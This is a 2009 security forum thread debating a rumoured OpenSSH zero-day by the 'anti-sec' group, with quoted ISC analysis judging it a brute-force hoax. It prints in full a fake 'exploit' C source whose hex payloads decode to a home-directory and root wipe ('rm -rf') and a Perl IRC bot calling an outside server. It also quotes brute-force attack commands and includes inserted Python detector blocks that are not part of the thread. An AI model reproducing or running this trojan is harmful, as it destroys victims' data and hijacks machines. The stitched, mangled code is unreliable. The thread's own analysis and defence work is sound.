openssh 0day rumors

    • #3974
      Jhaddix
      Participant

      http://www.securityaegis.com/?p=445

      I did a little recon on the rumors at the ISC:

      Rumors are flying of an underground openssh exploit. After some digging we find the tool name and its group:

      “./0pen0wn” by the hacker group called “anti-sec.”

      Two attack logs exist on the net with this supposed exploit, both by this group. The first is an attack on an Astalavista Admin:

      http://romeo.copyandpaste.info/txt/nowayout.txt

      The second attack is the one the Internet Storm Center blogged on which can be seen in its entirety here:

      http://tinyurl.com/l8tzba

      and a Russian site has a play by play of the attack here:

      http://tinyurl.com/m7cqdh

      A Belgian Blog has this to say about it:

          There have been a splash of openssh attacks and scanning – even in Belgium – and nobody seems to know what and why. There are some rumors and there is some discussion over at the Internet Storm Center but it is not all clear yet. The rumor is that a Zero day has been discovered for OLDER versions of Open SSH. This means there is no patch – but you can upgrade which will solve the issue.

          I know it is a lot of work but it is work that you have to do otherwise there will be much more other work that you will have to do when you become the stupid victim of an announced attack.

          Do the right thing. Upgrade to the latest versions

          ps what is strange about the openSSH scans is that they are scanning a whole set of ports, not only the traditional ones. Maybe to find the diverting tactics (by choosing another port not to be found while scanning). Means they are smart these guys.

          Rumor tells us that Black Hat US may be the place where more information would be launched about this attack. That promises. It looks like this blackhat conference will become a hell of a show…

    • #25376
      Jhaddix
      Participant

      Update:

      ISC has a third update saying this:

          We’ve received a few emails that lend credibility to the rumor, and we’ve received a few more that paint an interesting picture – that the reports are all part of a cover-up to hide another breach that was caused by a sysadmin’s mistake. What we are lacking is the actual exploit code. So if this is “for real” would somebody slip us a copy and leave it under the door mat? (Actually, our contact form is the best place.) We won’t tell anybody where it came from but it sure would put a lid on this story.

      If you look at the attack log the ./0pen0wn script drops them into a jailshell which they have to escape to get at the box. This might have some insight on the exploit? They use the ./MichaelScofield script (pun, because he’s a character in the TV series Prison Break) to get /bin/sh and go after passwords, etc.

      sh-3.1$ ./MichaelScofield

      [+] MichaelScofield – Prison Breaker / anti-sec group
      [+] Grabbing environment variables…

      SHELL=/usr/local/cpanel/bin/jailshell

      [+] Injecting new shell..

      [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

      SHELL=/bin/sh

    • #25377
      timmedin
      Participant

      All you probably know by now, but it was a hoax.

    • #25378
      Jhaddix
      Participant

      Well the director of the ISC said that the vuln had merit, then Bojan an ISC handler and pentester said the below quotes.

      I don’t wanna spread FUD but  I’d suggest following these steps given by ISC readers:

      -make sure SSH is updated

      -lock down SSH on the hardware firewall level to come only from authorized IP addresses

      -hosts.deny or iptables active response.

      -use a port-knocking system especially on the SSH service

      -Portsentry listens on port 22, while openSSH-server has another port. ban port 22 connections via portsentry and iptables

      it may just be a new type of bruteforce, it may be something else, best be prepared anyways =)

      For the last couple of days we’ve been all witnesses of FUD surrounding a supposed 0-day exploit for OpenSSH skyrocketing.

      At this moment, it definitely looks like we’re dealing with a hoax – even more, it’s not the first time someone said they have a 0-day exploit for SSH. So, let’s see some facts about this.

      It appears that the whole story started after a post to the Full-Disclosure mailing list on the 4th of July (http://seclists.org/fulldisclosure/2009/Jul/0028.html). The post supposedly shows a hacker group using a 0-day exploit for SSH to compromise a server. After doing some research here, it appears that this is a long standing argument between two guys (or groups). One of our readers submitted the following URL address (http://flx.me/astahack2.txt), which shows another hack.

      The “exploit” used in that file is a brute force attack for sure, as can be seen below:

      anti-sec:~/pwn/xpl# ./openPWN -h 66.96.220.213 -p 2222 -l=users.txt

      See the “-l” option? That supplies the list of users it will try to brute force.
      Additionally, a bit below it even prints which user was hacked:

            [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

            user: crownvip
            uname: Linux srv01.webhostline.com 2.6.21.5-hostnoc-3.1.7-libata-grsec-32 #1 SMP Mon Feb 11 06:36:58 EST 2008 i686 i686 i386 GNU/Linux

      Now, what has been posted on the Full-Disclosure list (the supposed exploit) looked like this:

      anti-sec:~/pwn/xpl# ./0pen0wn -h xx.yy.143.133 -p 22

      Same group, same server, same directory – different file name. Why didn’t they use the mighty 0-day first time? They brute forced into the server and then had to jail break.
      This looks very much like a hoax to me – and this is the only evidence we have about a 0-day? A post from an anonymous e-mail address (hushmail) to the Full-Disclosure mailing list (which, we all have to admit, isn’t the best source of verified information)? And this was even enough for some web hosting companies to *shut down* their SSH service? I find this unbelievable.

      Finally, OpenSSH developers would probably agree with me – one of the developers sent an e-mail to the Openssh-unix-dev mailing list (http://lwn.net/Articles/340483/) also stating the obvious.

      So, I’d like to ask everyone not to spread the FUD anymore. Every piece of evidence we received so far points only to brute force attacks on SSH servers (which have been around for years!). Do keep an eye on your server and install all patches. We will post more information if we receive it, but until then I think there was enough of this FUD.


      Bojan

      No one has been verified wrong or right yet.

      Bojan gave an interview here:

      Security researchers have warned that a reported flaw in OpenSSH (Secure Shell) is a probable hoax.

      Earlier this week, SANS received an anonymous email claiming of a zero-day vulnerability in OpenSSH, which means a flaw in the software is already being exploited as it becomes public. OpenSSH (Secure Shell), is used by administrators to make encrypted connections with other computers and do tasks such as remotely updating files. OpenSSH is the open-source version, and there are commercial versions of the program.

      A true zero-day vulnerability in OpenSSH could be devastating for the Internet, allowing hackers to have carte blanche access to servers and PCs until a workaround or a patch is readied.

      “That’s why I think people are actually creating quite a bit of a panic,” said Bojan Zdrnja, a SANS analyst and senior information security consultant at Infigo, a security and penetration testing company in Zagreb, Croatia. “People should not panic right now. Nothing at this time points that there is an exploit being used in the wild.”

      The evidence of a true zero-day vulnerability in OpenSSH is weak, Zdrnja said. So far, analysts haven’t seen a working exploit, despite worries that a group called Anti-Sec may have found a zero-day that allowed them to control a web server. Details on the hack were posted on Full Disclosure, which is an unmoderated forum for security information.

      When pressed for more details, a person claiming to be part of Anti-Sec wrote an e-mail to the IDG news service saying “I’m not allowed to actually discuss the exploit (or whether or not it exists),” which was signed “Anonymous.”

      Zdrnja said the same group compromised another server recently, but it appeared to be a brute-force attack against OpenSSH. A brute-force attack is where a hacker tries many combinations of authentication credentials in order to get access to a server. If an administrator is using simple log-ins and passwords, it makes a server more vulnerable to a brute-force attack, Zdrnja said.

      Both of the compromised servers were run by the same person. “I suppose what we are dealing with here are two hackers in a war between themselves,” Zdrnja said.

      But there are other factors that indicate a zero-day for OpenSSH doesn’t exist. If the zero-day existed, hackers would probably be more likely to use it against a more high-profile server than the most recent one that was compromised, Zdrnja said.

      One of OpenSSH’s developers, Damien Miller, also threw cold water on the possibility of a zero-day. Miller wrote on an OpenSSH forum that he had exchanged mails with an alleged victim of the zero-day, but the attacks appeared to be “simple brute-force.”

      “So, I’m not persuaded that a zero-day exists at all,” Miller wrote. “The only evidence so far are some anonymous rumors and unverifiable intrusion transcripts.”

      There also seems to be some confusion between the alleged zero-day and a different vulnerability in OpenSSH, Zdrnja said. That vulnerability, which is as of yet unpatched, could allow an attacker to recover up to 32 bits of plain text from an arbitrary block of ciphertext from a connection secured using the SSH protocol in the standard configuration, according to an advisory from the UK’s Center for the Protection of National Infrastructure (CPNI).

      The severity of the vulnerability is considered high, but the chance of successful exploitation is low, according to CPNI. Zdrnja said administrators can implement stronger authentication mechanisms in OpenSSH using public and private keys to guard against a successful attack. In an advisory, OpenSSH also stated that the possibility of a successful attack was low.
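
Bojan’s point is that every piece of evidence so far is ordinary SSH brute forcing, so the useful check is your own sshd log rather than the rumor mill. The following is an added example, not code from the thread or from the ISC: a small Python detector over constructed auth.log lines in the classic syslog format. It flags a source that reaches a failure threshold inside a time window and records a login accepted right after such a burst, which is the shape of the Astalavista transcript (a user list tried, then “user: crownvip”). The sample lines, the year, the threshold and the window are all assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd log lines in classic syslog format (not taken from any
# transcript in the thread). The first source walks a user list and gets in;
# the second is a legitimate user who mistypes a password once.
SAMPLE_AUTH_LOG = """\
Jul  6 02:14:01 srv01 sshd[2311]: Failed password for invalid user admin from 203.0.113.7 port 51020 ssh2
Jul  6 02:14:02 srv01 sshd[2313]: Failed password for invalid user test from 203.0.113.7 port 51021 ssh2
Jul  6 02:14:03 srv01 sshd[2315]: Failed password for root from 203.0.113.7 port 51022 ssh2
Jul  6 02:14:04 srv01 sshd[2317]: Failed password for invalid user oracle from 203.0.113.7 port 51023 ssh2
Jul  6 02:14:06 srv01 sshd[2319]: Failed password for crownvip from 203.0.113.7 port 51024 ssh2
Jul  6 02:14:09 srv01 sshd[2321]: Accepted password for crownvip from 203.0.113.7 port 51025 ssh2
Jul  6 02:20:00 srv01 sshd[2400]: Failed password for alice from 198.51.100.4 port 40001 ssh2
Jul  6 02:20:30 srv01 sshd[2402]: Accepted publickey for alice from 198.51.100.4 port 40002 ssh2
"""

LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_line(line, year=2009):
    """Parse one sshd auth line; syslog carries no year, so one is supplied (assumed 2009)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: info} for sources reaching `threshold` failures inside `window`.
    info["users"] lists the names tried; info["success_after_burst"] is the user
    whose login was accepted while the burst was still inside the window."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still in the window
    tried = defaultdict(set)      # ip -> usernames seen in failed attempts
    alerts = {}
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        q = recent[ev["ip"]]
        while q and ev["ts"] - q[0] > window:   # slide the window forward
            q.popleft()
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            tried[ev["ip"]].add(ev["user"])
            if len(q) >= threshold:
                a = alerts.setdefault(ev["ip"], {"success_after_burst": None})
                a["failures"] = len(q)
                a["users"] = sorted(tried[ev["ip"]])
        elif len(q) >= threshold:
            # A success right after a burst is the brute-force "win": treat it
            # as an incident on that account, not merely a source to ban.
            alerts[ev["ip"]]["success_after_burst"] = ev["user"]
    return alerts

if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, info)
```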

    • #25379
      Vedder
      Participant

      @timmedin wrote:

      All you probably know by now, but it was a hoax.

      They have hit Imageshack over the weekend, looks like it’s another ssh exploit.

      I thought it was a hoax at first as well, now I am not so sure.

    • #25380
      Ketchup
      Participant

      I saw that it was Anti-Sec that hit Imageshack, but I couldn’t find how they did it.  Where did you see that it was an SSH exploit?  Can you please post a link?

    • #25381
      alan
      Participant

      only thing i saw was http://romeo.copyandpaste.info/txt/imageshack-pwned.txt

      nothing to suggest ssh?

    • #25382
      Ketchup
      Participant

      Thanks.  I saw the same elsewhere too.  There really isn’t much in terms of detail there, but it does reference OpenSSH, so who knows. 

    • #25383
      Jhaddix
      Participant

      captured during the netwars SANS CTF

      /* 0pen0wn.c by anti-sec group
      *
      * OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT.
      *
      *
      * Takes advantage of an off-by-one
      * bug in mapped authentication space on system
      */
      #include
      #include
      #include
      #include
      #include
      #include
      #include
      #include
      #include
      #include

      #define VALID_RANGE 0xb44ffe00
      #define build_frem(x,y,a,b,c) a##c##a##x##y##b

      char jmpcode[] =
          "x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2f"
          "x64x65x76x2fx6ex75x6cx6cx20x26";

      char shellcode[] =
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx0ax24x6bx65"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
              "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
              "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
              "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
              "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
              "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
              "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
              "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
              "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
              "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
              "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
              "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
              "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
              "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
              "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
              "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
              "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
              "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
              "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
              "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
              "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
              "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
              "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
              "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
              "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
              "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
              "x64x20x2bx78x20x2fx74x6dx70x2fx68x69x20x32x3ex2f"
              "x64x65x76x2fx6ex75x6cx6cx3bx2fx74x6dx70x2fx68x69"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
              "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
              "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
              "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
              "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
              "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
              "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
              "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
              "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a";


      char fbsd_shellcode[] =
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
              "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
              "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
              "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
              "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
              "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
              "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
              "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
              "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
              "x64x20x2bx78x20x2fx74x6dx70x2fx68x69x20x32x3ex2f"
              "x64x65x76x2fx6ex75x6cx6cx3bx2fx74x6dx70x2fx68x69"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
              "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
              "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
              "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
              "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
              "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
              "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
              "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
              "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
              "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
              "x7dx7dx23x63x68x6dx6fx64x20x2bx78x20x2fx74x6dx70"
              "x2fx68x69x20x32x3ex2fx64x65x76x2fx6ex75x6cx6cx3b"
              "x2fx74x6dx70x2fx68x69x0a";
      #define SIZE 0xffffff     
      #define OFFSET 131
      #define fremote build_frem(t,e,s,m,y)

      void usage(char *arg){
              printf("n[+] 0pen0wn 0wnz Linux/FreeBSDn");
              printf("  Usage: %s -h -p portn",arg);
              printf("  Options:n");
              printf("  t-h ip/host of targetn");
              printf("  t-p portn");
              printf("  t-d usernamen");
              printf("  t-B memory_limit 8/16/64nnn");
      }

      #define FD 0x080518fc
      #define BD 0x08082000

      int main(int argc, char **argv){
          FILE *jmpinst;
          char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
          int port=23, limit=8, target=0, sock;
          struct hostent *host;
          struct sockaddr_in addr;

          if (geteuid()) {
          puts("need root for raw socket, etc...");
          return 1;
          }

          if(argc < 3){
              usage(argv[0]);
              return 1;
          }

       
          printf("n  [+] 0wn0wn - by anti-sec groupn");
         
            if (!inet_aton(h, &addr.sin_addr)){
              host = gethostbyname(h);
              if (!host){
                  printf("  [-] Resolving failedn");
                  return 1;
              }
              addr.sin_addr = *(struct in_addr*)host->h_addr;
          }
         
          sock = socket(PF_INET, SOCK_STREAM, 0);
          addr.sin_port = htons(port);
          addr.sin_family = AF_INET;
          if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
              printf("  [-] Connecting failedn");
              return 1;
          }
          payload = malloc(limit * 10000);
          ptr = payload+8;
          memcpy(ptr,jmpcode,strlen(jmpcode));
          jmpinst=fopen(shellcode+793,"w+");
          if(jmpinst){
              fseek(jmpinst,0,SEEK_SET);
              fprintf(jmpinst,"%s",shellcode);
              fclose(jmpinst);
          }
          ptr += strlen(jmpcode);
          if(target != 5 && target != 6){
              memcpy(ptr,shellcode,strlen(shellcode));
              ptr += strlen(shellcode);
              memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
          }
          else{
              memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
              ptr += strlen(fbsd_shellcode);
              memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
          }
          send(sock,buffer,strlen(buffer),0);
          send(sock,ptr,3750,0);
          close(sock);
          if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == -1) {
              printf("  [-] connecting failedn");             
          }

          payload[sizeof(payload)-1] = '';
          payload[sizeof(payload)-2] = '';
          send(sock,buffer,strlen(buffer),0);
          send(sock,payload,strlen(payload),0);
          close(sock);
          free(payload);
          addr.sin_port = htons(6666);
          if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == 0) {
                        /* v--- our cool bar that says: "r0000000t!!!" */
              printf("n  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]nn");
              fremote("PS1='sh-3.2#' /bin/sh");
          }
          else
              printf("  [-] failed to exploit target :-(n");
          close(sock);
          return 0;
      }
    • #25384
      lincoln
      Participant

      Have you tried that code? I wouldn’t recommend it, only test on a virtual box you wouldn’t mind losing

    • #25385
      Ketchup
      Participant

      LOL, I second that.  The jmpcode[] converts to:

      rm -rf ~ /* 2> /dev/null &

    • #25386
      timmedin
      Participant

      @Ketchup wrote:

      LOL, I second that.   The jmpcode[] converts to:

      rm -rf ~ /* 2> /dev/null &

      …if we then jump into null and retrieve all files as we ride a unicorn over to the rainbow…

    • #25387
      UNIX
      Participant

      I have only looked through the posted source code quickly but it doesn’t seem to be an “openssh 0day exploit”.

    • #25388
      Vedder
      Participant

      @Ketchup wrote:

      LOL, I second that.  The jmpcode[] converts to:

      rm -rf ~ /* 2> /dev/null &

      Noobish question here – how do you convert that?

      /off to read up on shellcoding…

      *edit*

      Hex -> ASCII!

      Google works wonders 😉
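
Hex to ASCII is exactly it. As an added example (not code from the thread), a decoder that turns the posted C escape strings back into text and a quick triage pass over the result, so a “PoC” can be read before anyone compiles it. It is tolerant of the backslash-stripped form the forum shows (“x72x6D…” where the original source read “\x72\x6D…”); the triage pattern list is a constructed one.

```python
import re

# jmpcode[] as it appears in the posted 0pen0wn.c; the forum extraction
# dropped the backslashes, so the original source read "\x72\x6D...".
JMPCODE = (
    "x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2f"
    "x64x65x76x2fx6ex75x6cx6cx20x26"
)

# One \xNN escape; the backslash is optional so both forms decode.
_HEX_ESCAPE = re.compile(r"\\?x([0-9a-fA-F]{2})")

# Constructed indicator list (not from the thread): things worth a second look
# in a decoded payload, including the IRC-bot strings and /tmp drop the other
# two arrays in the post contain.
_TRIAGE_PATTERNS = {
    "destructive shell command": re.compile(r"\brm\s+-(?:[a-z]*r[a-z]*f|[a-z]*f[a-z]*r)\b"),
    "embedded script": re.compile(r"^#!/", re.MULTILINE),
    "IRC bot behaviour": re.compile(r"\b(?:JOIN|PRIVMSG|NICK)\b"),
    "writes to /tmp": re.compile(r"/tmp/\S+"),
}

def decode_hex_escapes(literal: str) -> str:
    r"""Turn a C string literal made of \xNN escapes into text.
    latin-1 is used so every byte value decodes; works on the intact form
    ("\x72\x6D") and on the stripped form ("x72x6D") seen in the post."""
    data = bytes(int(m.group(1), 16) for m in _HEX_ESCAPE.finditer(literal))
    return data.decode("latin-1")

def triage(decoded: str) -> list:
    """Return the names of the indicator patterns present in decoded text."""
    return [name for name, rx in _TRIAGE_PATTERNS.items() if rx.search(decoded)]

if __name__ == "__main__":
    text = decode_hex_escapes(JMPCODE)
    print(repr(text))    # 'rm -rf ~ /* 2> /dev/null &'
    print(triage(text))  # ['destructive shell command']
```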

    • #25389
      Vedder
      Participant

      I have just been converting the shellcode and all it seems to do is try and connect to an IRC channel.

      Am I missing something about the exploits “usefulness”?

      I will compile and test this on a virtual box at home later, it’ll be interesting, more as my first steps into understanding shellcode/exploits more than anything!

    • #25390
      Ketchup
      Participant

      Vedder, this does not appear to be an SSH exploit. This looks more like the anti-sec group screwing around and trying to get people to erase their hard drives. All this is likely to do is run the rm command on all of your files. While I think that you are totally on the right track with testing exploits, I would just pick a legitimate one from milw0rm to play with.

    • #25391
      Vedder
      Participant

      Thanks Ketchup, that’s a very good idea, I’ll do that instead.

    • #25392
      Jhaddix
      Participant

      Sorry! I meant to post here but forgot… This code connects you to the IRC channel ‘Fag’ and frags your hard drive =(

    • #25393
      UNIX
      Participant

      anti-sec is again in the news.. it seems they have hacked http://blackhat-forums.com/ too and about two hours later a message was posted at seclists.org.
      It seems astalavista was attacked too.

      They also supplied information on a website of them.

    • #25394
      Ketchup
      Participant

      I was looking at that.  It’s difficult to judge how much capabilities they have, considering they are very much anti-disclosure.  They claim to have a few 0days in their arsenal, but I can’t tell how legitimate those claims are.  I am guessing though, that this forum would likely be one of their targets based on their mission.

    • #25395
      timmedin
      Participant

      I heard rumors that the 0day was “found” by a sys admin trying to cover his butt after an incident due to a misconfiguration. I’ve heard it from a few different places, but they are just rumors.

    • #25396
      UNIX
      Participant
    • #25397
      Ketchup
      Participant

      awesec, you always seem to get to these faster than I ;D I’ve been trying to follow this as well.

      I really doubt that any sort of exploit, if it exists, is going to be released to the public.  Anti-sec movement is specifically against disclosing 0days.  I don’t see why they would break ranks on this one. 

      The message posted on the ssanz.net site right now is a bit strange.  It almost seems like the site admin is in on it. 


      SSANZ - Hacked

      Unfortunately SSANZ has been hacked by anti-sec group.

      Data has been erased & Backups erased.

      SSANZ Staff sincerely apologizes for this breach of security.

      What do you think?

    • #25398
      UNIX
      Participant

      As written in the second link given:

      – Why SSANZ?

      Owned by a kid who claims he can manage, secure and audit servers,
      he offers a service that he clearly cannot provide, we are against that.

      It is a little “weird” that first sites such as imageshack, blackhat forums and astalavista were hacked and now such a – compared to the others – small site. Also on the first mentioned sites there was “just a hack” but on ssanz it says

      […] Data has been erased & Backups erased. […]

      which doesn’t fit either.

      As anti-sec group is currently discussed on many news sites.. more links which may interest someone:

      http://www.webhostingtalk.com/showthread.php?t=854441
      http://ptc-investgations.blogspot.com/2009/07/mega-cash-zone-megacashzonecom-scam.html
      http://forums.digitalpoint.com/showthread.php?t=871938
      http://www.gpforums.co.nz/showthread.php?s=&postid=6198073

      Also note statements with different goals:

